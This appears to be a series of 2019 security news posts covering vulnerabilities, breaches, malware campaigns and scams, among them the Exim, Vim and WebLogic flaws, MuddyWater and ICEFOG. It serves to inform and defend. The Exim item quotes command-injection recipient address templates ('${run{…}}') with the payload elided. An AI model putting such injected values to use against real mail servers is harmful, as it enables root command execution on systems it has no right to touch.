“A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.” reads the security advisory.

“An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.”

Microsoft fixes a total of three critical remote code execution vulnerabilities in Windows Hyper-V (CVE-2019-0620, CVE-2019-0709, CVE-2019-0722), the Microsoft virtualization software that allows running multiple operating systems as virtual machines on Windows.

The Remote code execution flaws in the Hyper-V allow an attacker to execute arbitrary code on the host operating system just by executing a specially crafted application on a guest operating system.

Patch Tuesday security updates for June 2019 also addressed two important severity vulnerabilities, tracked as CVE-2019-1040 and CVE-2019-1019, that affect Microsoft’s NTLM authentication protocol. The flaws could be exploited by remote attackers to bypass NTLM protection mechanisms and re-enable NTLM Relay attacks.

The full list of vulnerabilities addressed by Microsoft is available here.

Experts pointed out that Microsoft failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs trigger a denial of service condition by interrupting the encryption service for other programs.

This vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. According to the Google 90-days disclosure policy, Ormandy today publicly released details and proof-of-concept of the vulnerability.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, hacking)

The post Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws appeared first on Security Affairs.

Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash

Adobe Patch Tuesday updates for June 2019 address several critical arbitrary code execution flaws in Flash Player, ColdFusion and Campaign products.

Adobe Patch Tuesday security updates for June 2019 address some critical arbitrary code execution vulnerabilities in Flash Player, ColdFusion and Campaign products.

Adobe fixed critical command injection, file extension blacklist bypass and deserialization vulnerabilities in ColdFusion. The vulnerabilities could lead to arbitrary code execution on vulnerable systems. Below the list of flaws in ColdFusion fixed by Adobe:

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
File extension blacklist bypassArbitrary code executionCritical (see note below) CVE-2019-7838
Command InjectionArbitrary code executionCritical (see note below) CVE-2019-7839
Deserialization of untrusted dataArbitrary code executionCritical (see note below) CVE-2019-7840

The issues affect ColdFusion 2016, 2018 and 11.

Adobe credited Badcode of Knownsec 404 Team, Moritz Bechler of SySS GmbH, and Brenden Meeder of Booz Allen Hamilton for reporting the flaw.

Adobe also informed users that remote access to the Adobe LiveCycle Data Management feature has been disabled by default due to security risks.

Adobe Patch Tuesday security updates for June 2019 also address a critical use-after-free vulnerability (CVE-2019-7845) that could lead to arbitrary code execution. The flaw was anonymously reported via Trend Micro’s Zero Day Initiative.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address a critical vulnerability in Adobe Flash Player.” reads the security advisory. “Successful exploitation could lead to arbitrary code execution in the context of the current user. ”

Finally, Adobe addressed seven types of vulnerabilities in its Campaign product, including information disclosure, arbitrary file read, and code execution issues. The most severe vulnerability, tracked as CVE-2019-7850, is a critical command injection issue that could lead to arbitrary code execution.

Pierluigi Paganini

(SecurityAffairs – Adobe Patch Tuesday, hacking)

The post Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash appeared first on Security Affairs.

Customs and Border Protection (CBP) confirms hack of a subcontractor

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen by hackers.

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen as a result of a cyber attack.

The Customs and Border Protection agency did not reveal the name of the company that was involved in the incident. According to media outlets, hackers broke into the computer network of an unnamed subcontractor, many experts believe the incident could be linked to the hack of Perceptics.

At the end of May the company Perceptics, a leader in license plate readers (LPRs), license plate recognition systems and vehicle identification products, announced to have suffered a security breach. The attackers stole data and offered business plans, financial documents, and personal information for free on the dark web.

CBP perceptics hack files 2

LPRs manufactured by Perceptics are installed at all land border crossing lanes for privately owned vehicle traffic (POV) in the United States, Canada, and for the most critical lanes in Mexico.

A hacker that goes online with the moniker ‘Boris Bullet-Dodger’ reported the hack to The Register and shared with the journalists a list of files as proof of the attack.

A Customs spokesman revealed that fewer than 100,000 people have been impacted, hackers accessed to photos of travelers in vehicles entering and exiting the United States at a single land-border port of entry over one and a half months.

CBP said that stolen data are not available online or in the Dark Web.

“Initial information indicates that the subcontractor violated mandatory security and privacy protocols outlined in their contract,” reads a statement published by the CBP.

Anyway the subcontractor was not authorized to transfer copies of the images to its infrastructure without CBP’s authorization.

The Customs and Border Protection learned of the security breach on May 31, 2019, it pointed out that hackers did not compromise its network.

“The chairman of the House Homeland Security Committee, Rep. Bennie Thompson of Mississippi, noted with alarm that this is the “second major privacy breach at DHS this year.”” reported the AP.

“We must ensure we are not expanding the use of biometrics at the expense of the privacy of the American public,” he said in a statement.

Pierluigi Paganini

(SecurityAffairs – CBP, hacking)

The post Customs and Border Protection (CBP) confirms hack of a subcontractor appeared first on Security Affairs.

Security Affairs 2019-06-11 00:49:57

The MuddyWater cyber espionage group has used an updated multi-stage PowerShell backdoor in recent cyber attacks.

Security experts at Trend Micro report that the MuddyWater APT group (aka SeedWorm and TEMP.Zagros), has used an updated multi-stage PowerShell backdoor in recent cyber espionage campaigns.

The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

The threat actors continue to evolve their TTPs, a few weeks ago Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group and highlighted the usage of new anti-detection techniques.

Now, according to Trend Micro, the APT group has updated its multi-stage PowerStats backdoor, the experts already observed a new variant in spear-phishing attacks aimed at a university in Jordan and the Turkish government.

“One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government. The said legitimate entities’ sender addresses were not spoofed to deceive email recipients. Instead, the campaign used compromised legitimate accounts to trick victims into installing malware.” reads the analysis published by Trend Micro.

“Our analysis revealed that the threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3.”

MuddyWater hackers used some compromised legitimate accounts to send out spear-phishing message containing a document embedded with a malicious macro.

MuddyWater email

The macro was used to drop a VBE file that holds a block of data containing an obfuscated PowerShell script. 

The block of data will be decoded and saved to the %PUBLIC% directory with various names and image file extensions such as .jpeg and .png. The attackers’ PowerShell code implements a custom string obfuscation and junk stubs of code to make it difficult to analyze.

Once all the strings are deobfuscated, a final backdoor code is revealed. The malicious code backdoor first gathers operating system (OS) information and save the result to a log file that is sent back to the C&C server.

“Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server.” continues the analysis. “If such a file is found, it will be downloaded and executed using the Powershell.exeprocess.”

The hackers can launch a second state attack by sending specific commands to the backdoor. The malicious code is also able to install and execute other payloads, including another backdoor analyzed by Trend Micro that supports several commands such as taking screenshots, and executing commands via the cmd.exe binary.

The backdoor is also able to execute PowerShell code via the “Invoke-Expression” cmdlet.

The hackers connect to the C2 with PHP scripts that have a hardcoded token and a set of backend functions such as sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Trend Micro observed an evolution of the malicious code used by the MuddyWater group, in March and April, the hackers were using the heavily obfuscated POWERSTATS v2, but in May they deployed the new/ POWERSTATS v3 in May. 

The following table reports some of the campaigns observed by Trend Micro in H1 2019 with associated payloads and publicly available post-exploitation tools:

 tools.

Discovery Date Method for dropping malicious codeType of files droppedFinal payload
2019-01MacrosEXESHARPSTATS
2019-01MacrosINF, EXEDELPHSTATS
2019-03MacrosBase64 encoded, BATPOWERSTATS v2
2019-04Template injectionDocument with macrosPOWERSTATS v1 or v2
2019-05MacrosVBEPOWERSTATS v3

It is interesting to note that the MuddyWater attackers are not using zero-days exploits in their campaigns, anyway the threat actors continue to evolve their TTPs to avoid the detection.

“While MuddyWater appears to have no access to zero-days and advanced malware variants, it still managed to compromise its targets. This can be attributed to the constant development of their schemes. Notably, the group’s use of email as an infection vector seems to yield success for their campaigns,” Trend Micro concludes. 

Pierluigi Paganini

(SecurityAffairs – MuddyWater, hacking)

The post appeared first on Security Affairs.

CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign

The CVE-2019-2725 vulnerability in Oracle WebLogic recently, addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.

Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.

The flaw is a deserialization remote command execution zero-day vulnerability that affects the Oracle WebLogic wls9_async and wlswsat components.

The issue affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

The CVE-2019-2725 flaw was patched in late April, unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.

After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.

The malware used in this campaign hides its malicious codes in certificate files to evade detection.

CVE-2019-2725 cryptojacking

Once the malware is executed it exploits the CVE-2019-2725 flaw to execute a command and perform a series of routines. 

“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.

“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”

The attack chains starts with a PowerShell that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then execute it using PowerShell. The downloaded file is then deleted using cmd.

The certificate file appears as a Privacy-Enhanced Mail (PEM) format certificate, it is in the form of a PowerShell command instead of the X.509 TLS file format.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”

The command in the certificate file is used by crooks to download and execute another PowerShell script in memory. The script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script in memory), Sysguard .exe (watchdog for the miner process), and Clean.bat (deletes other components). 

Experts noticed that the update.ps1 file that contains the decoded certificate file is replaced with the new update.ps1 and a scheduled task is created to execute the new PowerShell script every 30 minutes.

The idea of hiding malware into certificate is not a novelty, experts at Sophos explored this technique in a proof of concept late last year.

“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2725, Oracle WebLogic)

The post CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign appeared first on Security Affairs.

CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system

Bad news for Linux users, a flaw tracked as CVE-2019-12735 allows to hack their systems by tricking them into opening a specially crafted file in Vim or Neovim Editor.

Security expert Armin Razmjou has recently found a high-severity vulnerability (CVE-2019-12735) in Vim and Neovim command-line text editing applications.

The vulnerability, tracked as CVE-2019-12735, is classified as an arbitrary OS command execution vulnerability. Both Vim and Neovim editing applications are pre-installed in Linux distros.

“Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.” reads the security advisory published by the expert.

Vim is a highly configurable text editor for efficiently creating and changing any kind of text, including documents and scripts.

With 30% less source-code than Vim, the vision of Neovim is to enable new applications without compromising Vim’s traditional roles and enhancing the user experience

The vulnerability affects the way the Vim editor handles the “modelines” option. The modeline feature allows users to specify custom editor options near the start or end of a file (i.e. /* vim: set textwidth=80 tabstop=8: */). The feature is enabled by default and it is applied to all file types.

Only a subset of options is allowed in modelines, if an expression is included in the option value, it is executed in a sandbox.

Razmjou explained that it is possible to craft construct a modeline that execute the code outside the sandbox.

“However, the :source! command (with the bang [!] modifier) can be used to bypass the sandbox. It reads and executes commands from a given file as if typed manually, running them after the sandbox has been left.” continues the expert.

The expert demonstrated that by tricking a victim into opening a specially crafted file using Vim or Neovim it is possible to secretly execute commands on its Linux system and remotely take over it.

Razmjou published two proof-of-concept exploits to the public, one of which allows a remote attacker to gain access to a reverse shell.

“This PoC outlines a real-life attack approach in which a reverse shell is launched once the user opens the file. To conceal the attack, the file will be immediately rewritten when opened.” continues the post. “Also, the PoC uses terminal escape sequences to hide the modeline when the content is printed with cat. (cat -v reveals the actual content.)”

Below the video PoC of the attack:

CVE-2019-12735 Linux flaw

Vim and Neovim development teams already released security updates to address the CVE-2019-12735 flaw, Vim patch 8.1.1365 and Neovim patch (released in v0.3.6).

The expert also suggests to:

  • disable modelines feature,
  • disable “modelineexpr” to disallow expressions in modelines,
  • use “securemodelines plugin,” a secure alternative to Vim modelines.

Below the timeline of the flaw:

  • 2019-05-22 Vim and Neovim maintainers notified
  • 2019-05-23 Vim patch released
  • 2019-05-29 Neovim patch released
  • 2019-06-05 CVE ID CVE-2019-12735 assigned

Pierluigi Paganini

(SecurityAffairs – CVE-2019-12735, hacking)

The post CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system appeared first on Security Affairs.

CIA sextortion campaign, analysis of a well-organized scam

Crooks are posing as CIA agents in a sextortion campaign, they are sending emails to inform the victims of an investigation into online pedophilia rings.

Crooks are posing as CIA agents in a new sextortion campaign, they are sending emails to inform potential victims of an ongoing investigation into online pedophilia rings.

Fraudsters are offering to drop the investigations on the victims for money, according to experts at Kaspersky.

“The author of the e-mails that caught our experts’ collective eye poses as a CIA officer who has allegedly found the recipient’s details in Case #45361978 (relating to possession and distribution of child pornography, or so it seems). ” reads a post published by Kaspersky. “The “officer” states that the CIA is about to swoop in on more than 2,000 individuals suspected of pedophilia in 27 countries around the globe. The message implies that the recipient is accused of being one of them. “

Crooks claim they are conducting a “large international operation set to arrest more than 2000 individuals in 27 countries.”

In order to scare people and trick them into paying, the fraudsters claim to have collected evidence of the illegal activities, they are telling the victims that they have collected the mark’s home and work addresses, contact information, they also claim to have recorded each recipient’s ISP and browsing history, social media activity. chat logs, and also Tor browsing activity,

The fake CIA agents are offering to drop the investigation and destroy the evidence for a $10,000 Bitcoin payout.

“I read the documentation and I know you are a wealthy person who may be concerned about reputation,” reads the scam email message sent to the victims. “I am one of several people who have access to those documents and I have enough security clearance to amend and remove your details from this case.”

Sextortion campaigns are not a novelty in the threat landscape, in most cases, victims concern of reputational damage in case hackers will expose their immoral habits to friends and colleagues.

The messages used in the “CIA” sextortion campaign are well-written with a good layout, they appear as authentic.

“Such messages are sent to thousands or even millions of people in the hope that just a handful will swallow the bait,” explained Kaspersky senior anti-spam analyst Tatyana Scherbakova.

“Given the size of the ransom, if even a few victims pay up, it will have been worth the cybercriminals’ time and effort.”

Below the recommendations provided by Kaspersky:

  • Never pay scammers; that would only encourage the extortionists even more.
  • Do not respond to the e-mail, even if you really want to prove to the author that your name is in the “case file” by mistake. By doing so, you would be confirming that your address is valid and provoke an even greater wave of spam. For the same reason, do not try to troll the scammers.
  • Close the message and mark it as spam — this will help the spam filter to do its job better.

Pierluigi Paganini

(SecurityAffairs – sextortio, scam)

The post CIA sextortion campaign, analysis of a well-organized scam appeared first on Security Affairs.

Retro video game website Emuparadise suffered a data breach

Retro video game website Emuparadise revealed to have suffered a data breach that exposed 1.1 Million accounts back in April 2018.

Emuparadise is a website that offers tons of roms, isos and retro video games, users can download and play them with an emulator or play them with the web browser.

The security breach occurred in April 2018 and exposed account information for approximately 1.1 million Emuparadise forum members.

Since August 2018, Emuparadise no longer host game ROMs, anyway it continued to offer any kind of info for retro video games and operated community forums.

Emuparadise hacki

Over the weekend, some Emuparadise forum members reported to have received data breach notification notices from the popular services Have I Been Pwned and HackNotice. The notices notify them of the security breach and inform them that their data were exposed as part of the data breach that occurred in April 2018.

The notice issued by the service Have I Been Pwned states that 1,131,229 accounts from Emuparadise forums were exposed in an incident occurred in April 2018. The forums run on a vBulletin CMS, a very popular platform, but older versions are known to be vulnerable to several issues.

HIBP received the data from dehashed.com on June 9th, 2019, exposed info includes mail addresses, IP address, usernames and passwords stored as salted MD5 hashes.

“In April 2018, the self-proclaimed “biggest retro gaming website on earth”, Emupardise, suffered a date breach.” states Have I Been Pwned. “The compromised vBulletin forum exposed 1.1 million email addresses, IP address, usernames and passwords stored as salted MD5 hashes.

At the time of writing, it is not known how DeHashed obtained the huge trove of data.

Experts pointed out that Emuparadise data are offered for sale in the cybercrime underground and on hacking forums since early 2019.

Pierluigi Paganini

(SecurityAffairs – Emuparadise, hacking)

The post Retro video game website Emuparadise suffered a data breach appeared first on Security Affairs.

Spain extradites 94 Taiwanese to China phone and online fraud charges

Spanish authorities extradited 94 Taiwanese to China to face telephone and online fraud charges, Taiwan’s Foreign Ministry expressed a strong regret.

Spain extradited 94 Taiwanese to China to face telephone and online fraud charges, the indicted were transferred via plane by officials.

“The suspects arrived Friday morning at Beijing airport on a chartered flight. Footage on state broadcaster CCTV showed uniformed officers escorting them off the China Eastern plane one-by-one.” reads a post published by the AP press.

The Taiwan Central News Agency reported that Taiwan’s Foreign Ministry expressed “serious concern and strong regret.”

The investigation on the scam operations in Spain started in 2016, crooks targeted victims in China. A joint operation conducted by Chinese and Spanish Police allowed the identification of the people involved. In December, authorities raided 13 sites in Madrid, Barcelona and other cities in Spain.

These arrests could be considered as the result of the first joint operation conducted by China with a European country against telecom fraud.

According to the Chinese Public Security Ministry, the telephone and online frauds allowed the suspects to earn 120 million yuan ($17 million).

In the fraud scheme, the criminals impersonate Chinese authorities and attempt to trick victims into transferring money to accounts controlled by the scammers.

“Similar scams operate from several countries and usually prey on Chinese.” continues the AP. “The callers typically masquerade as Chinese authorities and pressure or persuade the victims to transfer money to the scammers’ accounts.”

Spainish authorities already extradited 225 suspects, 218 of which are Taiwanese.

Even is Taiwan split from China in 1949 during a civil war, Beijing still considers the country as part of its territory. The two governments signed an agreement in 2009 to join the efforts in the fight against the crime.

The tension between the countries peaked after the election of Taiwanese President Tsai Ing-wen, that is not considered aligned with Chinese politic.

Chinese authorities asked foreign countries, including Spain, to move criminals to China where they would face severe sentence.

Taiwan evidently doesn’t agree with the decision of Spain authorities of extraditing the suspects to China, instead of its country.

Liu Zhongyi, the deputy director of the Chinese Criminal Investigation Bureau, highlighted the difficulties associated with international investigations that involve differed law frameworks implemented by different states, such as China and Spain.

“We have overcome various difficulties,” Zhongyi told CCTV.

Liu explained that many other criminal gangs operating in the China-Myanmar border area and in Southeast Asia are targeting Chinese citizens.

Pierluigi Paganini

(SecurityAffairs – phone scam, online fraud)

The post Spain extradites 94 Taiwanese to China phone and online fraud charges appeared first on Security Affairs.

Millions of Exim mail servers vulnerable to cyber attacks

Millions of Exim mail servers are exposed to attacks due to a critical vulnerability that makes it possible for unauthenticated remote attackers to execute arbitrary commands.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The vulnerability, tracked as CVE-2019-10149, resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

“In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved.” reads the security advisory published by Qualys. “This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations).”

The CVE-2019-10149 flaw was called ‘The Return of the WIZard,” a reference to Sendmail’s ancient WIZ and DEBUG vulnerabilities.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

Experts explained that in order to remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days. It is necessary to transmit one byte every few minutes, however, the experts cannot guarantee that this exploitation method is unique.

Experts pointed out that the following non-default Exim configurations could be easily exploited by a remote attacker:

  • If the “verify = recipient” ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely.
  • If Exim was configured to recognize tags in the local part of the recipient’s address (via “local_part_suffix = +* : -*” for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “balrog+${run{…}}@localhost” (where “balrog” is the name of a local user).
  • If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “${run{…}}@khazad.dum” (where “khazad.dum” is one of Exim’s relay_to_domains). Indeed, the “verify = recipient” ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part.

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February. Unfortunately, a large number of operating systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim it is possible to find 4,353,180 installs most of them in the United States (2,462,098).

Exim flaw

Searching for patched Exim installs running the 4.92 release we can find 1,071,818 systems.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers vulnerable to cyber attacks appeared first on Security Affairs.

Security Affairs newsletter Round 217 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

ESET analyzes Turla APTs usage of weaponized PowerShell
Leicester City Football Club disclosed a card breach
ProtonMail denies that it spies on users for government agencies
Expert shows how to Hack a Supra Smart Cloud TV
Gaining Root Access to Host through rkt Container hack
Google is taking action on deceptive installation tactics for Chrome Browser Extensions
Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more
Threat actors abuse Microsoft Azure to Host Malware and C2 Servers
A month later Gamaredon is still active in Eastern Europe
Australian teenager hacked into Apple twice for a job
CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions
macOS zero-day in Mojave could allow Synthetic Clicks attacks
OilRigs Jason email hacking tool leaked online
BlackSquid malware uses multiple exploits to drop cryptocurrency miners
Expert developed a MetaSploit module for the BlueKeep flaw
NSA urges Windows Users and admins to Patch BlueKeep flaw
Tens of Million patients impacted by the AMCA data breach
The Australian National University suffered a major, sophisticated attack
0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day
Analyzing the APT34s Jason project
Cisco disclosed several flaws in Cisco Industrial Network Director
Platinum APT and leverages steganography to hide C2 communications
Remote code execution flaw in Ministra IPTV Platform exposes user data and more
Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android
VMware addressed flaws in its Workstation and Tools
Crooks stole about $10 million from GateHub cryptocurrency wallet service
Cryptocurrency startup Komodo hacks itself to protect its users funds from hackers
Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know
New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers
SandboxEscaper releases Byebear exploit to bypass patched EoP flaw
Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks
Hunting the ICEFOG APT group after years of silence
Recently a large chunk of European mobile traffic was rerouted through China Telecom

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 217 – News of the week appeared first on Security Affairs.

Critical RCE affects older Diebold Nixdorf ATMs

Automated teller machine vendor Diebold Nixdorf has released security updates to address a remote code execution vulnerability in older ATMs.

Diebold Nixdorf discovered a remote code execution vulnerability in older ATMs and is urging its customers in installing security updates it has released to address the flaw.

The vulnerability affects older Opteva model ATMs, Diebold Nixdorf will start notifying the customers next week.

The group of security researchers NightSt0rm published technical details about the vulnerability in a blog post on Medium. The experts explained that had access to an ATM of Diebold vendor and started analyzing the machine a simple PC running Windows OS and exposing some services implemented by the ATM provider. The focused their analysis on the Spiservice service listening on post 8043.

“Look at the output of command, there is a service (Spiservice) which running on port 8043. The SpiService.exe is associated with XFS, the Extension for Financial Services DLL library (MSXFS.dll) that is specifically used by ATMs.” reads the post published by the experts. “The library provides a special API for the communication with the ATM’s PIN pad and the cash dispenser.”

The ATM tested by the expert is running Aglis XFS for Opteva version 4.1.61.1. Attempting to connect to the service via a web browser, experts noticed it calls many libraries, including a library called VDMXFS.dll.

According to Diebold Nixdorf, this service only runs on Opteva version 4.x software, successive versions are not affected.

The application use RemotingConfiguration.Configure and accepts “server.config” as a parameter used to load config. Analyzing the file, the experts discovered that the program uses the .NET Remoting technique. This technique allows different applications to communicate with each other. 

The researchers created two applications to remotely interact with the application and captured the network traffic, with this trick they found the application HTTP SOAP protocol used for the communication.

The ATM maker released Agilis XFS for Opteva – BulkCashRec (BCRM) version 4.1.22 that doesn’t expose the service’s configuration online.

The experts pointed out that this attack could be prevented by properly configuring the terminal-based firewall that is included in the older version of Opteve ATMs. the good news is that the firewall is enabled by default, this means that only ATM owners that disabled it are at risk.

The NightSt0rm team attempted to report the issue to Diebold Nixdorf but did not receive a reply.

At the time, there is not news of attacks in the wild that exploited this RCE flaw.

Pierluigi Paganini

(SecurityAffairs – Diebold Nixdorf, ATM)

The post Critical RCE affects older Diebold Nixdorf ATMs appeared first on Security Affairs.

Facebook is going to stop Huawei pre-installing apps on mobile devices

Facebook announced it would stop Huawei from pre-installing social networking apps on its smartphones to comply with US sanctions.

Facebook announced it will no longer allow pre-installation of its social networking apps on Huawei smartphones to comply with the US ban on the Chinese tech giant.

“We are reviewing the Commerce Department’s final rule and the more recently issued temporary general license and taking steps to ensure compliance,” a Facebook spokesperson told AFP.

The decision will not impact on customers who already have Huawei phones, but new devices will not have Facebook, WhatsApp and Instagram apps pre-installed.

Facebook Inc is no longer allowing pre-installation of its apps on Huawei phones, the latest blow for the Chinese tech giant as it struggles to keep its business afloat in the face of a U.S. ban on its purchase of American parts and software.” reported the Reuters.

Facebook followed Google in the decision to ban the Chinese firm, recently Alphabet Inc’s Google has announced the suspension of some business with Huawei after Trump’s ban on the telco giant.

Everyone will buy a Huawei device will have no access to updates to Google Android and will have no access to Google services, including the Google Play Store and Gmail and YouTube apps.

Google confirmed that Huawei will only be able to use the public version of Android (Android Open Source Project (AOSP)), but the users of the Chinese giant will not be able to get access to proprietary apps and services from Google.

Pierluigi Paganini

(SecurityAffairs – Huawei, Facebook)

The post Facebook is going to stop Huawei pre-installing apps on mobile devices appeared first on Security Affairs.

Hunting the ICEFOG APT group after years of silence

A security researcher found new evidence of activities conducted by the ICEFOG APT group, also tracked by the experts as Fucobha.

Chi-en (Ashley) Shen, a senior security researcher at FireEye, collected evidence that demonstrates that China-linked APT group ICEFOG (aka Fucobha) is still active.

The activities of the APT group were first uncovered by Kaspersky Lab in September 2013, at the time the researchers defined the crew as an emerging group of cyber-mercenaries that was able to carry out surgical hit and run operations against strategic targets.  The cyber mercenaries were recruited by governments and private companies, it was composed of highly skilled hackers able to conduct sophisticated attacks.

The APT group is considered a persistent collector of sensitive information, Kaspersky team detected a series of attacks against the defense supply chain (e.g. Military contractors, shipbuilders, satellite operators, high-tech companies ) in Japan and South Korea.

The Icefog team also targeted companies in the energy industry in the US, threat actors used a custom backdoor dubbed “Fucobha”, which included exploits for both Microsoft Windows and Mac OS X.

At the time the “hit and run” nature of the operations appeared unusual, the attackers were processing victims rapidly, stealing only information of interest and showing a deep knowledge of the targets and the information they were searching for.

The group of hackers went dark just after the Kaspersky shared findings of its investigation in September 2013.

This week, Chi-en (Ashley) Shen presented at the CONFidence cybersecurity conference held in Poland her analysis on new samples of malware associated with the ICEFOG group.

Two of them, tracked as ICEFOG-P and ICEFOG-M, have been used in targeted attacks in 2014 and 2018, respectively. Some samples for both variants have been compiled between 2014 and 2019.

icefog

Both ICEFOG-P and ICEFOG-M are more complex of the original backdoor, a circumstance that suggests the threat actors have continued to develop and use it.

ICEFOG-M is the latest variant, it is a fileless malware that supports the same features of the ICEFOG-P but leverages HTTPs for communications.

The researchers explained that the ICEFOG-P variant is not particularly complex, it remained under the radar simply because was rarely used.

The researcher also spotted a Mac version of the malware, tracked as MacFog) that was unknown in the cyber security community. MacFog was initially distributed in Chinese forums

Unlike the operations observed between 2011 and 2013, the new malware variants were involved in multiple campaigns conducted by different groups,

Shen spotted variants of the ICEFOG malware in attacks targeting:

  • an unnamed agriculture company in Europe in 2015
  • government, media, and finance organizations in Russia and Mongolia in 2015 (TOPNEWS campaign)
  • the government of multiple former Soviet states in 2015 (Roaming Tiger)
  • Kazach officials in 2016 (APPER campaign)
  • water source provider, banks, and government entities in Turkey, India, Kazakhstan, Uzbekistan, and Tajikistan in 2018 (WATERFIGHT campaign)
  • an unknown entity in the Philippines in 2018 (PHKIGHT campaign)
  • organizations in Turkey and Kazakhstan in 2018 and 2019 (SKYLINE campaign)

In the latest campaign in 2019, tracked as SKYLINE Campaign, hackers targeted Turkey and Kazakhstan, the timestamp suggests the campaign might have been active at least since 2018. Attackers leveraged CVE 2017-11882 shared exploit template and used a fileless version of the ICEFOG-M.

icefog attacks timeline

According to Shen, most samples were mainly involved in cyber espionage campaign, threat actors appear to be politically motivated.

Below the conclusions of the excellent analysis conducted by Shen:

  • ICEFOG is malware shared among Roaming Tiger, APT15, Temp Group A and suspected APT9.
  • Shared malware is a pitfall for attribution, we should not do attribution only based on malware.
